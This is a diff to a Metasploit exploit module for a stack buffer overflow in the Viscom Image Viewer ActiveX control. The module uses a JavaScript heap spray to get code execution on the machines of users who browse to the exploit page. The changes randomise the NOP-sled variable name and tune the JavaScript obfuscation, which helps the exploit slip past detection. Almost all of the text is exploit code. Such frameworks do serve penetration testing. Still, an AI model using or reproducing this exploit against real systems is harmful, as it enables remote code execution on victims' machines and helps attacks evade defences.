@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
       'Description'    => %q{
           This module exploits a stack based buffer overflow in the Active control file
-        ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
+        ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()
         method. Exploitation results in code execution with the privileges of the user who
         browsed to the exploit page.
 
@@ -127,6 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     sploit << [0x41414141].pack("V") # Filler
     sploit << [0x42424242].pack("V") # Filler
@@ -139,7 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);
@@ -166,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = "<html>"
